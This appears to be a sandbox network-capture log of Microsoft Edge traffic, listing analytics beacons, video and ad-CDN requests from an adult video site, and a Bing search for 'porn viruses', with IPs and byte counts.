GET https://etahub.com/events?app_id=10896&bfeatureValue=true&eventName=fullscreenBtn&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenBtn&sfsTime=undefined&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&bfeatureValue=false&eventName=fullscreenArea&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenArea&sfsTime=0&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Request

GET https://etahub.com/events?app_id=10896&bfeatureValue=true&eventName=fullscreenBtn&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenBtn&sfsTime=undefined&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10948&eventName=timewatched&featureName=timewatched&featureValue=5&h=www.pornhub.com&msid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&orientation=desktopMode&osName=Windows&osVersion=10&platform=desktop&playerName=desktop&playerVersion=8.1.0_240905.551&ps=videoPage&pt=5&rf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&siteName=pornhub&vd=900&vid=457809091&vt=1728144256&ws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&bfeatureValue=false&eventName=fullscreenArea&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=fullscreenArea&sfsTime=2&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&sres=1280x720&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200

HTTP Request

GET https://etahub.com/events?app_id=10896&bfeatureValue=false&eventName=chromecast&nosVersion=10&nvd=900&nvid=457809091&nvt=1728144256&sfeatureName=chromecast&sh=www.pornhub.com&smsid=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c&sorientation=desktopMode&sosName=Windows&splatform=desktop&splayerName=desktop&splayerVersion=8.1.0_240905.551&sps=videoPage&srf=https%3A%2F%2Fwww.pornhub.com%2F%3Futm_source%3DPPORNHUB.COM%26utm_medium%3Dredirects%26utm_campaign%3Dtldredirects&ssiteName=pornhub&sws=981bc45223f3bab3dc4aea990c3531b4

HTTP Response

200
64.210.156.23:443

https://ht-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

tls, http2

msedge.exe

5.1kB
710.5kB
86
500

HTTP Request

GET https://ht-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

HTTP Response

206

HTTP Request

GET https://ht-cdn.trafficjunky.net/uploaded_content/video/002/317/221/2317221_video.mp4

HTTP Response

206
64.210.156.0:443

https://evtubescms.phncdn.com/pre_videos/002/460/721/2460721/mp4_720.mp4

tls, http2

msedge.exe

11.5kB
2.0MB
226
1406

HTTP Request

GET https://evtubescms.phncdn.com/pre_videos/002/460/721/2460721/mp4_720.mp4

HTTP Response

206
64.210.156.21:443

https://pix-ht.trafficjunky.net/c3721/uploaded_content/creative/102/991/222/1/1029912221.jpg/plain/autoquality:dssim:0.004::100:0.001?validfrom=1727539457&validto=1728749057&hash=AI20WbSmA0biVXPRsNB%2BhQlYHE0%3D

tls, http2

msedge.exe

2.6kB
59.3kB
29
51

HTTP Request

GET https://pix-ht.trafficjunky.net/c3721/uploaded_content/creative/102/991/222/1/1029912221.jpg/plain/autoquality:dssim:0.004::100:0.001?validfrom=1727539457&validto=1728749057&hash=AI20WbSmA0biVXPRsNB%2BhQlYHE0%3D

HTTP Response

200
64.210.156.4:443

https://hw-cdn2.adtng.com/a7/creatives/1/49/820021/1113552/1113552_video.mp4

tls, http2

msedge.exe

6.6kB
886.3kB
88
618

HTTP Request

GET https://hw-cdn2.adtng.com/delivery/vortex/vortex-simple-1.0.0.js

HTTP Request

GET https://hw-cdn2.adtng.com/a7/creatives/1/49/820021/1113552/1113552_logo.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://hw-cdn2.adtng.com/a7/creatives/1/49/820021/1113552/1113552_video.mp4

HTTP Response

206
64.210.156.21:443

https://ei.phncdn.com/videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S0.jpg

tls, http2

msedge.exe

2.2kB
145.2kB
21
106

HTTP Request

GET https://ei.phncdn.com/videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S0.jpg

HTTP Response

200
151.101.193.229:443

https://cdn.jsdelivr.net/npm/hls.js@1.5.14/dist/hls.min.js

tls, http2

msedge.exe

4.1kB
126.6kB
66
138

HTTP Request

GET https://cdn.jsdelivr.net/npm/hls.js@1.5.14/dist/hls.min.js

HTTP Response

200
152.195.34.118:443

https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-6-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

tls, http2

msedge.exe

34.8kB
7.0MB
677
4883

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/master.m3u8?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/index-v1-a1.m3u8?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-1-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-2-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-3-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-4-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-5-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200

HTTP Request

GET https://cv-h.phncdn.com/hls/videos/202409/15/457809091/720P_4000K_457809091.mp4/seg-6-v1-a1.ts?SalUdJgijuPEMigWp81jgsJswXSXjp7fZmGdwDb1uGgU60KZtYPAoYD6n4xo1dlIIGHxAKdaZIQX490rwuIWv-RIc15CqCSzsCVk2-4uiq-uHppopdRNnPYk4YTlcCNTmcJKpglv1SuxYIEkeUxRgnjgJrvgfwZyEkOJUwVXkAA2PD39vFg3vdm_EFY1wDqtSePhwqNoRng

HTTP Response

200
64.210.156.21:443

https://ei.phncdn.com/videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S6.jpg

tls, http2

msedge.exe

2.1kB
145.9kB
19
106

HTTP Request

GET https://ei.phncdn.com/videos/202409/15/457809091/timeline/160x90/(m=eGCaiCObaaaa)(mh=_p3qeuCj3gZQt4s5)S6.jpg

HTTP Response

200
64.210.156.21:443

https://ei.phncdn.com/www-static/images/htmlPauseRoll/pb_block_sprite.png?cache=2024100303

tls, http2

msedge.exe

1.7kB
2.9kB
9
11

HTTP Request

GET https://ei.phncdn.com/www-static/images/htmlPauseRoll/pb_block_sprite.png?cache=2024100303

HTTP Response

200
143.244.57.57:443

https://pix-cdn77.trafficjunky.net/c3721/uploaded_content/creative/102/780/669/1/1027806691.gif/plain/q:85?secure=4PaMZPqyWU5_6hNVc9cUrw==,1728230683

tls, http2

msedge.exe

2.3kB
35.8kB
25
46

HTTP Request

GET https://pix-cdn77.trafficjunky.net/c3721/uploaded_content/creative/102/780/669/1/1027806691.gif/plain/q:85?secure=4PaMZPqyWU5_6hNVc9cUrw==,1728230683

HTTP Response

200
92.123.128.189:443

https://www.bing.com/qbox?query=porn&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=fbe56689473b452ba630bdc5cb08b944&oit=1&cp=4&pgcl=4

tls, http

msedge.exe

1.5kB
849 B
7
7

HTTP Request

GET https://www.bing.com/qbox?query=porn&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=fbe56689473b452ba630bdc5cb08b944&oit=1&cp=4&pgcl=4
92.123.128.189:443

https://www.bing.com/qbox?query=porn+viruse&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=d2a090ad2ac740ef865b0bc018698c70&oit=4&cp=11&pgcl=4

tls, http

msedge.exe

5.1kB
16.3kB
20
26

HTTP Request

GET https://www.bing.com/qbox?query=porn+&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=23b69a0dab1f4e45bf19276e019c1174&oit=1&cp=5&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=porn+v&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=b9aaf558adf74cb2b5183259e6863d31&oit=4&cp=6&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=porn+vi&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=f76df93fe8764ce490a79706cc83befe&oit=4&cp=7&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=porn+vir&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=c5f33866e3944d35a5b82e4ebb885c67&oit=4&cp=8&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=porn+viru&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=a579bce550404ab0bd16976d2ffc87f8&oit=4&cp=9&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=porn+virus&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=ef1e86cbd2c34afd9830e29f26b52d47&oit=4&cp=10&pgcl=4

HTTP Response

200

HTTP Request

GET https://www.bing.com/qbox?query=porn+viruse&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=d2a090ad2ac740ef865b0bc018698c70&oit=4&cp=11&pgcl=4
92.123.128.189:443

https://www.bing.com/fd/ls/lsp.aspx

tls, http

msedge.exe

53.2kB
105.9kB
92
136

HTTP Request

GET https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531

HTTP Response

200

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Semibold.woff2

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:4057,%22BC%22:4057,%22SE%22:-1,%22TC%22:-1,%22H%22:4151,%22BP%22:4439,%22CT%22:4440,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,498,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144329942%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22250%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144329942%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=0DD30F05AB304142B388EAD39E0E9879&iid=.5092&ptn=Web&ep=0&iconpl=1

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332447%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1728144333126%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144333256%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144333508%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruses%2Cig%3A671C458530CA49EAB145F7E69517C1CF%22%2C%22AnswerInfo%22%3Anull%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144333513%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334252%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334269%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=porn%20viru&cp=9&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aporn%20viruse%2Ci%3A1%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144334479%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334823%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334861%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144334869%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144334912%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20virus%2Ci%3A2%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335008%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335061%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335081%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20viru%2Ci%3A3%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335083%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vir%2Ci%3A4%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335238%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335483%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335538%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20vi%2Ci%3A5%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144335689%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144335923%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144335955%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20v%2Ci%3A6%22%2C%22AsResponseLength%22%3A%2280%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144336154%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336331%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336378%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%22%2C%22AsResponseLength%22%3A%22513%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144336521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%20%2Ci%3A7%2Cig%3AAD769DB1D1C54297B43D5836059655BA%22%2C%22AnswerInfo%22%3A%22AS%3B23%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144336521%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144336897%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aporn%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144336941%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.35f285fec4c025cd6d429d20ac232906&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.386baad53bb81bdd42db8e4da40ae6e9&w=120&h=120&c=6&p=0&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.f921ea0403325e186ba0da1699fdd1ef&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.cjMdjXLY8eGBRLiEp8zRUkFGW1OVS7uL4pPWDtArqTk&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OIP.vZk9avfjlOx4vsHNEfwe1QHaHY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=vi&cp=2&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK._vzDUekSctUDhNYvDOIBNkScdAI6uPBYoFGsGsQbcPU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.AHmLqMpP2qROuTUoOByD0OvwrI_egv3-LCqF6fRe3gM&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx
92.123.128.189:443

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

tls, http

msedge.exe

75.6kB
105.8kB
142
186

HTTP Request

GET https://www.bing.com/sa/simg/Roboto_Regular.woff2

HTTP Response

200

HTTP Request

GET https://www.bing.com/rp/9JZoMKGwSFpYBOFiek9nl1XTYtg.br.js

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22ClientDimNotSent%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=0DD30F05AB304142B388EAD39E0E9879

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.5725b4c466ca3726e7a6df52730dacd2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.4b3edcfa1422114f11e29d94be9f0544&w=120&h=120&c=6&p=0&pid=RS

HTTP Response

200

HTTP Request

